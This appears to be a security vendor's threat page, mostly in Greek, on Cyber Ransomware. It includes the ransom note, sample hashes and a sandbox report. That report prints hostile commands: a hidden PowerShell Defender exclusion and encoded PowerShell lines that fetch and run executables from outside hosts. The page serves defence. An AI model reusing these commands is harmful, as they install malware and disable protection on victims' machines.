Cyber Ransomware
Απεικόνιση απειλών
EnigmaSoft Threat Scorecard
Τα EnigmaSoft Threat Scorecards είναι αναφορές αξιολόγησης για διαφορετικές απειλές κακόβουλου λογισμικού που έχουν συλλεχθεί και αναλυθεί από την ερευνητική μας ομάδα. Τα EnigmaSoft Threat Scorecards αξιολογούν και ταξινομούν τις απειλές χρησιμοποιώντας διάφορες μετρήσεις, συμπεριλαμβανομένων των πραγματικών και πιθανών παραγόντων κινδύνου, των τάσεων, της συχνότητας, της επικράτησης και της εμμονής. Οι κάρτες αποτελεσμάτων EnigmaSoft Threat ενημερώνονται τακτικά με βάση τα ερευνητικά δεδομένα και τις μετρήσεις μας και είναι χρήσιμες για ένα ευρύ φάσμα χρηστών υπολογιστών, από τελικούς χρήστες που αναζητούν λύσεις για την αφαίρεση κακόβουλου λογισμικού από τα συστήματά τους έως ειδικούς σε θέματα ασφάλειας που αναλύουν απειλές.
Οι κάρτες αποτελεσμάτων EnigmaSoft Threat εμφανίζουν μια ποικιλία από χρήσιμες πληροφορίες, όπως:
Popularity Rank: The ranking of a particular threat in EnigmaSoft’s Threat Database.
Επίπεδο σοβαρότητας: Το καθορισμένο επίπεδο σοβαρότητας ενός αντικειμένου, που αναπαρίσταται αριθμητικά, με βάση τη διαδικασία μοντελοποίησης κινδύνου και την έρευνά μας, όπως εξηγείται στα Κριτήρια αξιολόγησης απειλών .
Μολυσμένοι υπολογιστές: Ο αριθμός των επιβεβαιωμένων και ύποπτων περιπτώσεων μιας συγκεκριμένης απειλής που εντοπίστηκαν σε μολυσμένους υπολογιστές όπως αναφέρθηκε από το SpyHunter.
Δείτε επίσης Κριτήρια αξιολόγησης απειλών .
| Popularity Rank: | 10,078 |
| Επίπεδο απειλής: | 100 % (Υψηλός) |
| Μολυσμένοι υπολογιστές: | 3,489 |
| Πρώτη εμφάνιση: | October 15, 2021 |
| Εθεάθη τελευταία: | November 12, 2025 |
| ΛΣ που επηρεάζονται: | Windows |
Το κακόβουλο πρόγραμμα με το όνομα Cyber είναι κακόβουλο λογισμικό από τον τύπο ransomware. Μόλις εκτελεστεί σε ένα σύστημα που έχει παραβιαστεί, ξεκινά αμέσως μια διαδικασία κρυπτογράφησης για όλα τα αρχεία στη συσκευή και προσαρτά τα αρχικά τους ονόματα αρχείων με την επέκταση «.Cyber». Για παράδειγμα, ένα αρχείο με αρχικό όνομα «1.doc» θα εμφανίζεται τώρα ως «1.doc.Cyber» αφού κρυπτογραφηθεί. Ομοίως, το "2.pdf" θα γίνει "2.pdf.Cyber" και ούτω καθεξής. Οι ερευνητές κυβερνοασφάλειας επισημαίνουν ότι η απειλή Cyber Ransomware βασίζεται στο στέλεχος κακόβουλου λογισμικού Chaos.
Εκτός από την κρυπτογράφηση αρχείων, το Cyber Ransomware αλλάζει επίσης την ταπετσαρία της επιφάνειας εργασίας και δημιουργεί μια σημείωση λύτρων με το όνομα "read_it.txt". Το σημείωμα λύτρων περιέχει οδηγίες για τα θύματα, με τους κυβερνοεγκληματίες που είναι υπεύθυνοι για επιθέσεις ransomware να απαιτούν συνήθως πληρωμή με αντάλλαγμα το κλειδί αποκρυπτογράφησης για να ξεκλειδώσουν τα κρυπτογραφημένα αρχεία.
Πίνακας περιεχομένων
Το Cyber Ransomware μπορεί να καταστήσει μη προσβάσιμους πολλούς τύπους αρχείων μέσω κρυπτογράφησης
Η σημείωση ransomware υποδεικνύει ότι τα σημαντικά αρχεία του θύματος, όπως βάσεις δεδομένων, έγγραφα και φωτογραφίες, έχουν κρυπτογραφηθεί και μπορούν να αποκρυπτογραφηθούν μόνο με την πληρωμή λύτρων σε κρυπτονόμισμα Bitcoin. Το ποσό των λύτρων αναφέρεται συνήθως και δίνεται στα θύματα ένας τρόπος να δοκιμάσουν την αποκρυπτογράφηση σε περιορισμένο αριθμό αρχείων προτού πληρώσουν.
Το σημείωμα περιέχει συχνά στοιχεία επικοινωνίας για τους εισβολείς ή τους εκπροσώπους τους. Ωστόσο, μερικές φορές τα στοιχεία επικοινωνίας μπορεί να μην είναι έγκυρα και το θύμα μπορεί να δυσκολεύεται να επικοινωνήσει με τους εισβολείς. Επιπλέον, η ταπετσαρία του ransomware μπορεί να εμφανίζει το ίδιο μήνυμα και το ίδιο ποσό λύτρων αλλά με διαφορετικά στοιχεία επικοινωνίας.
Στις περισσότερες επιθέσεις ransomware, η αποκρυπτογράφηση χωρίς τη συμμετοχή των εισβολέων συνήθως δεν είναι δυνατή. Ακόμη και όταν τα θύματα πληρώνουν τα λύτρα, ενδέχεται να μην λάβουν τα κλειδιά αποκρυπτογράφησης ή το λογισμικό που είναι απαραίτητο για την ανάκτηση των αρχείων τους. Ως αποτέλεσμα, οι ειδικοί συμβουλεύουν σθεναρά να μην πληρώσετε τα λύτρα, ακόμη και αν τα στοιχεία επικοινωνίας είναι νόμιμα και το ποσό των λύτρων φαίνεται προσιτό.
Είναι σημαντικό να θυμάστε ότι η πληρωμή των λύτρων υποστηρίζει εγκληματική δραστηριότητα και δεν εγγυάται την ανάκτηση των κρυπτογραφημένων δεδομένων. Τα θύματα θα πρέπει να διερευνήσουν άλλες επιλογές, όπως η επαναφορά αρχείων από αντίγραφα ασφαλείας ή η αναζήτηση βοήθειας από ειδικούς σε θέματα ασφάλειας.
Φροντίστε να προστατεύσετε τις συσκευές και τα δεδομένα σας από απειλές όπως το Cyber Ransomware
Τα καλύτερα μέτρα που μπορούν να εφαρμόσουν οι χρήστες για την προστασία των συσκευών και των δεδομένων τους από επιθέσεις ransomware περιλαμβάνουν έναν συνδυασμό προληπτικών και αντιδραστικών στρατηγικών.
Πρώτον, οι χρήστες θα πρέπει να είναι προσεκτικοί στη διαδικτυακή τους δραστηριότητα και να λαμβάνουν μέτρα για να αποφύγουν να πέσουν θύματα κοινών φορέων μόλυνσης από ransomware, όπως μηνύματα ηλεκτρονικού ψαρέματος ή κακόβουλες λήψεις. Αυτό περιλαμβάνει τη χρήση ισχυρών και μοναδικών κωδικών πρόσβασης, την τακτική ενημέρωση λογισμικού και λειτουργικών συστημάτων και την προσοχή σε ύποπτα μηνύματα ηλεκτρονικού ταχυδρομείου ή συνδέσμους.
Δεύτερον, οι χρήστες θα πρέπει να εφαρμόζουν μέτρα ασφαλείας, όπως η χρήση αξιόπιστου λογισμικού προστασίας από κακόβουλο λογισμικό και να επιτρέπουν στα τείχη προστασίας να εμποδίζουν τη μη εξουσιοδοτημένη πρόσβαση στις συσκευές τους. Θα πρέπει επίσης να εξετάσουν το ενδεχόμενο χρήσης εργαλείων ανίχνευσης και απόκρισης τελικού σημείου (EDR), τα οποία μπορούν να βοηθήσουν στον εντοπισμό και την απόκριση σε επιθέσεις ransomware σε πραγματικό χρόνο.
Τρίτον, οι χρήστες θα πρέπει να δημιουργούν τακτικά αντίγραφα ασφαλείας των σημαντικών δεδομένων τους σε μια εξωτερική πηγή, όπως μια υπηρεσία cloud ή έναν εξωτερικό σκληρό δίσκο. Αυτό μπορεί να βοηθήσει να διασφαλιστεί ότι ακόμη και αν η συσκευή τους έχει μολυνθεί με ransomware, θα μπορούν να έχουν πρόσβαση στα δεδομένα τους χωρίς να πληρώσουν τα λύτρα.
Τέταρτον, σε περίπτωση επίθεσης ransomware, οι χρήστες θα πρέπει να αποφεύγουν να πληρώνουν τα λύτρα καθώς μπορεί να μην εγγυάται την ασφαλή ανάκτηση των δεδομένων τους και μπορεί επίσης να ενθαρρύνει περαιτέρω εγκληματική δραστηριότητα. Αντίθετα, θα πρέπει να αναζητήσουν επαγγελματική βοήθεια από ειδικούς σε θέματα ασφάλειας και να εξετάσουν το ενδεχόμενο να αναφέρουν την επίθεση στις αρχές επιβολής του νόμου.
Τέλος, οι χρήστες θα πρέπει να μένουν ενημερωμένοι για τις πιο πρόσφατες απειλές ransomware και τις εξελισσόμενες τεχνικές επιθέσεων για να παραμείνουν ενήμεροι και προετοιμασμένοι να προστατευτούν από πιθανές επιθέσεις.
Το πλήρες κείμενο του σημειώματος λύτρων που κυκλοφόρησε από το Cyber Ransomware είναι:
Μην ανησυχείτε, μπορείτε να επιστρέψετε όλα τα αρχεία σας!
Όλα τα αρχεία σας, όπως έγγραφα, φωτογραφίες, βάσεις δεδομένων και άλλα σημαντικά είναι κρυπτογραφημένα
Τι εγγυήσεις σας δίνουμε;
Μπορείτε να στείλετε 3 από τα κρυπτογραφημένα αρχεία σας και εμείς τα αποκρυπτογραφούμε δωρεάν.
Πρέπει να ακολουθήσετε αυτά τα βήματα για να αποκρυπτογραφήσετε τα αρχεία σας:
1) Γράψτε στο e-mail μας :test@test.com (Σε περίπτωση που δεν απαντήσετε σε 24 ώρες ελέγξτε τον φάκελο ανεπιθύμητης αλληλογραφίας σας
ή γράψτε μας σε αυτό το e-mail: test2@test.com)
2) Αποκτήστε Bitcoin (Πρέπει να πληρώσετε για αποκρυπτογράφηση σε Bitcoins.
Μετά την πληρωμή θα σας στείλουμε το εργαλείο που θα αποκρυπτογραφήσει όλα τα αρχεία σας.)
Cyber Ransomware βίντεο
Συμβουλή: Ενεργοποιήστε τον ήχο σας και παρακολουθήστε το βίντεο σε λειτουργία πλήρους οθόνης .

Έκθεση ανάλυσης
Γενικές πληροφορίες
| Family Name: | Cyber Ransomware |
|---|---|
| Signature status: | No Signature |
Known Samples
Known Samples
This section lists other file samples believed to be associated with this family.|
MD5:
6ae50bdc7246401c666cd7e1b200d87a
SHA1:
ec759c5df1845d1109fe2518380233ae1854850f
Μέγεθος αρχείου:
1.84 MB, 1839616 bytes
|
|
MD5:
92a4a3aa4b40e95e8ca1d015c048246b
SHA1:
443a688cc83423c7511d56b626f85a392e798ac1
Μέγεθος αρχείου:
5.12 KB, 5120 bytes
|
|
MD5:
969c9e50187024581e8943a2d8ed9d2d
SHA1:
57cec27d4e6c7714265cad52f7fd9cf58f68bb82
SHA256:
C78A44442518C4EC39EF4E85C331C5CDD25C92FC92A80010C6F6DC3F59B1C42D
Μέγεθος αρχείου:
4.61 KB, 4608 bytes
|
|
MD5:
d1657a06fd2a757c43372f77ed433f30
SHA1:
48d0f17e206fdcff74121783989c90117ee411f4
SHA256:
0AFC88FC7DD731CF7D5884C415D5A27DC4FB39EB54DC890257AFEA947FC05725
Μέγεθος αρχείου:
4.54 MB, 4536320 bytes
|
Windows Portable Executable Attributes
- File doesn't have "Rich" header
- File doesn't have debug information
- File doesn't have exports table
- File doesn't have relocations information
- File doesn't have security information
- File is 32-bit executable
- File is either console or GUI application
- File is GUI application (IMAGE_SUBSYSTEM_WINDOWS_GUI)
- File is Native application (NOT .NET application)
- File is not packed
Show More
- IMAGE_FILE_DLL is not set inside PE header (Executable)
- IMAGE_FILE_EXECUTABLE_IMAGE is set inside PE header (Executable Image)
File Icons
File Icons
This section displays icon resources found within family samples. Malware often replicates icons commonly associated with legitimate software to mislead users into believing the malware is safe.File Traits
- HighEntropy
- No Version Info
- x86
Block Information
Block Information
During analysis, EnigmaSoft breaks file samples into logical blocks for classification and comparison with other samples. Blocks can be used to generate malware detection rules and to group file samples into families based on shared source code, functionality and other distinguishing attributes and characteristics. This section lists a summary of this block data, as well as its classification by EnigmaSoft. A visual representation of the block data is also displayed, where available.| Total Blocks: | 8 |
|---|---|
| Potentially Malicious Blocks: | 7 |
| Whitelisted Blocks: | 1 |
| Unknown Blocks: | 0 |
Visual Map
? - Unknown Block
x - Potentially Malicious Block
Similar Families
Similar Families
This section lists other families that share similarities with this family, based on EnigmaSoft’s analysis. Many malware families are created from the same malware toolkits and use the same packing and encryption techniques but uniquely extend functionality. Similar families may also share source code, attributes, icons, subcomponents, compromised and/or invalid digital signatures, and network characteristics. Researchers leverage these similarities to rapidly and effectively triage file samples and extend malware detection rules.- ClipBanker.VA
- ClipBanker.VB
Files Modified
Files Modified
This section lists files that were created, modified, moved and/or deleted by samples in this family. File system activity can provide valuable insight into how malware functions on the operating system.| File | Attributes |
|---|---|
| \device\namedpipe\pshost.133968239486036860.2548.defaultappdomain.powershell | Generic Read,Write Data,Write Attributes,Write extended,Append data,LEFT 524288 |
| \device\namedpipe\pshost.133973844142271624.5256.defaultappdomain.powershell | Generic Read,Write Data,Write Attributes,Write extended,Append data,LEFT 524288 |
| \device\namedpipe\pshost.134074942406200962.1348.defaultappdomain.powershell | Generic Read,Write Data,Write Attributes,Write extended,Append data,LEFT 524288 |
| c:\users\user\appdata\local\cheat.dll | Generic Write,Read Attributes |
| c:\users\user\appdata\local\launcher.exe | Generic Write,Read Attributes |
| c:\users\user\appdata\local\launcher.ini | Generic Write,Read Attributes |
| c:\users\user\appdata\local\microsoft\windows\explorer\iconcache_16.db | Generic Read,Write Data,Write Attributes,Write extended,Append data |
| c:\users\user\appdata\local\microsoft\windows\explorer\iconcache_idx.db | Generic Read,Write Data,Write Attributes,Write extended,Append data |
| c:\users\user\appdata\local\temp\__psscriptpolicytest_0zdqbhap.r32.ps1 | Generic Write,Read Attributes |
| c:\users\user\appdata\local\temp\__psscriptpolicytest_24snuqhq.oyp.ps1 | Generic Write,Read Attributes |
Show More
| c:\users\user\appdata\local\temp\__psscriptpolicytest_al3g5ul4.lob.psm1 | Generic Write,Read Attributes |
| c:\users\user\appdata\local\temp\__psscriptpolicytest_aocz5vmr.rla.ps1 | Generic Write,Read Attributes |
| c:\users\user\appdata\local\temp\__psscriptpolicytest_dv4pkhv1.qlu.psm1 | Generic Write,Read Attributes |
| c:\users\user\appdata\local\temp\__psscriptpolicytest_iqv5olmb.tfb.psm1 | Generic Write,Read Attributes |
| c:\users\user\appdata\local\temp\__psscriptpolicytest_ruwcjycv.ppp.ps1 | Generic Write,Read Attributes |
| c:\users\user\appdata\local\temp\__psscriptpolicytest_ux1vmtfo.12w.psm1 | Generic Write,Read Attributes |
| c:\users\user\appdata\local\temp\album_td_3-8-0_activation.exe | Generic Write,Read Attributes |
| c:\users\user\appdata\local\temp\ixp000.tmp\father.bat | Generic Write,Read Attributes |
| c:\users\user\appdata\local\temp\ixp000.tmp\father.bat | Synchronize,Write Attributes |
| c:\users\user\appdata\local\temp\ixp000.tmp\modular.bat | Generic Write,Read Attributes |
| c:\users\user\appdata\local\temp\ixp000.tmp\modular.bat | Synchronize,Write Attributes |
| c:\users\user\appdata\local\temp\ixp000.tmp\modular.ps1 | Generic Write,Read Attributes |
| c:\users\user\appdata\local\temp\ixp000.tmp\modular.ps1 | Synchronize,Write Attributes |
| c:\users\user\appdata\local\temp\ixp000.tmp\tmp4351$.tmp | Generic Write,Read Attributes,Delete |
| c:\users\user\appdata\local\temp\ttrj.exe | Generic Write,Read Attributes |
| c:\users\user\deployment_test.exe | Generic Write,Read Attributes |
Registry Modifications
Registry Modifications
This section lists registry keys and values that were created, modified and/or deleted by samples in this family. Windows Registry activity can provide valuable insight into malware functionality. Additionally, malware often creates registry values to allow itself to automatically start and indefinitely persist after an initial infection has compromised the system.| Key::Value | Δεδομένα | API Name |
|---|---|---|
| HKCU\software\microsoft\windows\currentversion\internet settings\zonemap::proxybypass | RegNtPreCreateKey | |
| HKCU\software\microsoft\windows\currentversion\internet settings\zonemap::intranetname | RegNtPreCreateKey | |
| HKCU\software\microsoft\windows\currentversion\internet settings\zonemap::uncasintranet | RegNtPreCreateKey | |
| HKCU\software\microsoft\windows\currentversion\internet settings\zonemap::autodetect | RegNtPreCreateKey | |
| HKCU\software\microsoft\windows\currentversion\internet settings\zonemap::proxybypass | RegNtPreCreateKey | |
| HKCU\software\microsoft\windows\currentversion\internet settings\zonemap::intranetname | RegNtPreCreateKey | |
| HKCU\software\microsoft\windows\currentversion\internet settings\zonemap::uncasintranet | RegNtPreCreateKey | |
| HKCU\software\microsoft\windows\currentversion\internet settings\zonemap::autodetect | RegNtPreCreateKey | |
| HKLM\system\controlset001\services\bam\state\usersettings\s-1-5-21-3119368278-1123331430-659265220-1001::\device\harddiskvolume2\windows\system32\conhost.exe | 넜泝Ǜ | RegNtPreCreateKey |
| HKLM\software\microsoft\windows nt\currentversion\notifications\data::418a073aa3bc3475 | RegNtPreCreateKey |
Show More
| HKLM\software\microsoft\windows\currentversion\runonce::wextract_cleanup0 | rundll32.exe C:\WINDOWS\system32\advpack.dll,DelNodeRunDLL32 "C:\Users\Vebexpvr\AppData\Local\Temp\IXP000.TMP\" | RegNtPreCreateKey |
| HKLM\system\controlset001\services\bam\state\usersettings\s-1-5-21-3119368278-1123331430-659265220-1001::\device\harddiskvolume2\windows\system32\cmd.exe | ᭖洢Ǜ | RegNtPreCreateKey |
| HKLM\system\controlset001\services\bam\state\usersettings\s-1-5-21-3119368278-1123331430-659265220-1001::\device\harddiskvolume2\windows\system32\conhost.exe | 洧Ǜ | RegNtPreCreateKey |
| HKCU\software\microsoft\windows\currentversion\explorer\comdlg32\firstfolder::0 | C:\Users\Vebexpvr\AppData\Local\Launcher.exe C:\Users\Vebexpvr\AppData\Local | RegNtPreCreateKey |
| HKCU\software\microsoft\windows\currentversion\explorer\comdlg32\firstfolder::mrulistex | RegNtPreCreateKey | |
| HKCU\local settings\software\microsoft\windows\shell\bagmru::nodeslots | RegNtPreCreateKey | |
| HKCU\local settings\software\microsoft\windows\shell\bagmru::mrulistex | RegNtPreCreateKey | |
| HKCU\local settings\software\microsoft\windows\shell\bagmru\2\1::mrulistex | RegNtPreCreateKey | |
| HKCU\local settings\software\microsoft\windows\shell\bagmru::nodeslots | RegNtPreCreateKey | |
| HKCU\local settings\software\microsoft\windows\shell\bagmru::mrulistex | RegNtPreCreateKey | |
| HKCU\local settings\software\microsoft\windows\shell\bagmru::nodeslots | RegNtPreCreateKey | |
| HKCU\local settings\software\microsoft\windows\shell\bagmru::mrulistex | RegNtPreCreateKey | |
| HKCU\local settings\software\microsoft\windows\shell\bagmru\2\1\0::1 | Z1 敖敢灸牶 B 뻯 . Vebexpvr | RegNtPreCreateKey |
| HKCU\local settings\software\microsoft\windows\shell\bagmru\2\1\0::mrulistex | RegNtPreCreateKey | |
| HKCU\local settings\software\microsoft\windows\shell\bagmru\2\1\0\1::0 | V1 嫬齤灡摰瑡a@ 뻯啮坤嫬齤. 穗 붽æappdata | RegNtPreCreateKey |
| HKCU\local settings\software\microsoft\windows\shell\bagmru\2\1\0\1::mrulistex | RegNtPreCreateKey | |
| HKCU\local settings\software\microsoft\windows\shell\bagmru\2\1\0\1\0::0 | P1 嫬齤潬慣l< 뻯嫬齤嫬齥. 穘 ˑQlocal | RegNtPreCreateKey |
| HKCU\local settings\software\microsoft\windows\shell\bagmru\2\1\0\1\0::mrulistex | RegNtPreCreateKey | |
| HKCU\local settings\software\microsoft\windows\shell\bagmru::nodeslots | ȂȂȂȂȂȂȂȂȂȂȂȂȂȂȂȂȂȂȂȂȂȂȂȂȂȂȂȂȂȂȂȂȂȂȂȂȂȂȂȂȂȂȂȂȂȂȂȂȂȂȂȂȂȂȂȂȂȂȂȂȂȂȂȂȂȂ | RegNtPreCreateKey |
| HKCU\local settings\software\microsoft\windows\shell\bagmru\2\1\0\1\0\0::nodeslot | | RegNtPreCreateKey |
| HKCU\local settings\software\microsoft\windows\shell\bagmru\2\1\0\1\0\0::mrulistex | RegNtPreCreateKey | |
| HKCU\local settings\software\microsoft\windows\shell\bags\132\shell::sniffedfoldertype | Generic | RegNtPreCreateKey |
| HKCU\local settings\software\microsoft\windows\shell\bagmru::nodeslots | ȂȂȂȂȂȂȂȂȂȂȂȂȂȂȂȂȂȂȂȂȂȂȂȂȂȂȂȂȂȂȂȂȂȂȂȂȂȂȂȂȂȂȂȂȂȂȂȂȂȂȂȂȂȂȂȂȂȂȂȂȂȂȂȂȂȂ | RegNtPreCreateKey |
| HKCU\local settings\software\microsoft\windows\shell\bagmru::mrulistex | RegNtPreCreateKey | |
| HKCU\local settings\software\microsoft\windows\shell\bagmru::nodeslots | ȂȂȂȂȂȂȂȂȂȂȂȂȂȂȂȂȂȂȂȂȂȂȂȂȂȂȂȂȂȂȂȂȂȂȂȂȂȂȂȂȂȂȂȂȂȂȂȂȂȂȂȂȂȂȂȂȂȂȂȂȂȂȂȂȂȂ | RegNtPreCreateKey |
| HKCU\local settings\software\microsoft\windows\shell\bagmru::mrulistex | RegNtPreCreateKey | |
| HKCU\local settings\software\microsoft\windows\shell\bagmru::nodeslots | ȂȂȂȂȂȂȂȂȂȂȂȂȂȂȂȂȂȂȂȂȂȂȂȂȂȂȂȂȂȂȂȂȂȂȂȂȂȂȂȂȂȂȂȂȂȂȂȂȂȂȂȂȂȂȂȂȂȂȂȂȂȂȂȂȂȂ | RegNtPreCreateKey |
| HKCU\local settings\software\microsoft\windows\shell\bagmru::mrulistex | RegNtPreCreateKey | |
| HKLM\software\microsoft\windows nt\currentversion\notifications\data::418a073aa3bc3475 | RegNtPreCreateKey | |
| HKLM\system\controlset001\services\bam\state\usersettings\s-1-5-21-3119368278-1123331430-659265220-1001::\device\harddiskvolume2\windows\system32\conhost.exe | 椓嵌Ǜ | RegNtPreCreateKey |
| HKLM\software\microsoft\windows nt\currentversion\notifications\data::418a073aa3bc3475 | RegNtPreCreateKey | |
| HKLM\system\controlset001\services\bam\state\usersettings\s-1-5-21-3119368278-1123331430-659265220-1001::\device\harddiskvolume2\windows\system32\conhost.exe | ﻒ⍮味ǜ | RegNtPreCreateKey |
| HKLM\software\microsoft\windows nt\currentversion\notifications\data::418a073aa3bc3475 | 㴠 ȁ 龡^ 8 獖} | RegNtPreCreateKey |
| HKLM\software\microsoft\windows nt\currentversion\notifications\data::418a073aa3bc1c75 | RegNtPreCreateKey |
Windows API Usage
Windows API Usage
This section lists Windows API calls that are used by the samples in this family. Windows API usage analysis is a valuable tool that can help identify malicious activity, such as keylogging, security privilege escalation, data encryption, data exfiltration, interference with antivirus software, and network request manipulation.| Category | API |
|---|---|
| Process Manipulation Evasion |
|
| Process Shell Execute |
|
| Syscall Use |
Show More
206 additional items are not displayed above. |
| Anti Debug |
|
| User Data Access |
|
| Encryption Used |
|
| Other Suspicious |
|
Shell Command Execution
Shell Command Execution
This section lists Windows shell commands that are run by the samples in this family. Windows Shell commands are often leveraged by malware for nefarious purposes and can be used to elevate security privileges, download and launch other malware, exploit vulnerabilities, collect and exfiltrate data, and hide malicious activity.
open C:\Users\Vebexpvr\AppData\Local\Launcher.exe
|
open C:\Users\Vebexpvr\deployment_test.EXE
|
cmd.exe /c father.bat
|
C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command "Start-Process -WindowStyle Hidden -FilePath powershell -Verb RunAs -ArgumentList '-NoProfile -Command Add-MpPreference -ExclusionPath \"C:\Users\Vebexpvr\*\"
|
open powershell -EncodedCommand "PAAjAHYAYQBwACMAPgBTAHQAYQByAHQALQBTAGwAZQBlAHAAIAAtAFMAZQBjAG8AbgBkAHMAIAA1ADsAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBEAG8AdwBuAGwAbwBhAGQARgBpAGwAZQAoACcAaAB0AHQAcABzADoALwAvAGEAZABvAGIAZQAtAHAAbAB1AGcAaQBuAC4AaQBuAGYAbwAvAHkAYwAuAGUAeABlACcALAAgADwAIwBqAHMAeAAjAD4AIAAoAEoAbwBpAG4ALQBQAGEAdABoACAAPAAjAHcAZABzACMAPgAgAC0AUABhAHQAaAAgACQAZQBuAHYAOgBUAGUAbQBwACAAPAAjAGoAdAB4ACMAPgAgAC0AQwBoAGkAbABkAFAAYQB0AGgAIAAnAHkAYwAuAGUAeABlACcAKQApADwAIwBlAGEAdgAjAD4AOwAgACgATgBlAHcALQBPAGIAagBlAGMAdAAgAFMAeQBzAHQAZQBtAC4ATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAEYAaQBsAGUAKAAnAGgAdAB0AHAAcwA6AC8ALwBhAGQAbwBiAGUALQBwAGwAdQBnAGkAbgAuAGkAbgBmAG8ALwB5AGMAdgAuAGUAeABlACcALAAgADwAIwBqAHEAcgAjAD4AIAAoAEoAbwBpAG4ALQBQAGEAdABoACAAPAAjAGIAcQB1ACMAPgAgAC0AUABhAHQAaAAgACQAZQBuAHYAOgBUAGUAbQBwACAAPAAjAGMAdABjACMAPgAgAC0AQwBoAGkAbABkAFAAYQB0AGgAIAAnAHkAYwB2AC4AZQB4AGUAJwApACkAPAAjAGkAZgBpACMAPgA7ACAAUwB0AGEAcgB0AC0AUAByAG8AYwBlAHMAcwAgAC0ARgBpAGwAZQBQAGEAdABoACAAPAAjAHYAZwBtACMAPgAgACgASgBvAGkAbgAtAFAAYQB0AGgAIAAtAFAAYQB0AGgAIAAkAGUAbgB2ADoAVABlAG0AcAAgADwAIwBwAG0AZAAjAD4AIAAtAEMAaABpAGwAZABQAGEAdABoACAAJwB5AGMALgBlAHgAZQAnACkAPAAjAHYAcQBiACMAPgA7ACAAUwB0AGEAcgB0AC0AUAByAG8AYwBlAHMAcwAgAC0ARgBpAGwAZQBQAGEAdABoACAAPAAjAGwAdABiACMAPgAgACgASgBvAGkAbgAtAFAAYQB0AGgAIAAtAFAAYQB0AGgAIAAkAGUAbgB2ADoAVABlAG0AcAAgADwAIwByAHgAagAjAD4AIAAtAEMAaABpAGwAZABQAGEAdABoACAAJwB5AGMAdgAuAGUAeABlACcAKQA8ACMAegB2AHQAIwA+AA=="
|
Show More
open powershell -EncodedCommand "PAAjAHQAegBsACMAPgBTAHQAYQByAHQALQBTAGwAZQBlAHAAIAAtAFMAZQBjAG8AbgBkAHMAIAA4ADsAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBEAG8AdwBuAGwAbwBhAGQARgBpAGwAZQAoACcAaAB0AHQAcABzADoALwAvAGEAZABvAGIAZQBoAGUAbABwAC4AbgBlAHQALwB3AGkAbgA4ADYALgBlAHgAZQAnACwAIAA8ACMAegBhAHIAIwA+ACAAKABKAG8AaQBuAC0AUABhAHQAaAAgADwAIwBiAGwAZAAjAD4AIAAtAFAAYQB0AGgAIAAkAGUAbgB2ADoAVABlAG0AcAAgADwAIwBhAHMAdAAjAD4AIAAtAEMAaABpAGwAZABQAGEAdABoACAAJwB3AGkAbgA4ADYALgBlAHgAZQAnACkAKQA8ACMAaAB6AHgAIwA+ADsAIABTAHQAYQByAHQALQBQAHIAbwBjAGUAcwBzACAALQBGAGkAbABlAFAAYQB0AGgAIAA8ACMAbgBjAGoAIwA+ACAAKABKAG8AaQBuAC0AUABhAHQAaAAgAC0AUABhAHQAaAAgACQAZQBuAHYAOgBUAGUAbQBwACAAPAAjAGgAcgB5ACMAPgAgAC0AQwBoAGkAbABkAFAAYQB0AGgAIAAnAHcAaQBuADgANgAuAGUAeABlACcAKQA8ACMAbgB2AG0AIwA+AA=="
|
open powershell -EncodedCommand "PAAjAGsAYwBwACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAHAAcwBtACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAHQAZABqACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAHYAdABlACMAPgA="
|
open C:\Users\Qoceadrm\AppData\Local\Temp\Album_TD_3-8-0_Activation.exe
|
open C:\Users\Qoceadrm\AppData\Local\Temp\ttrj.exe
|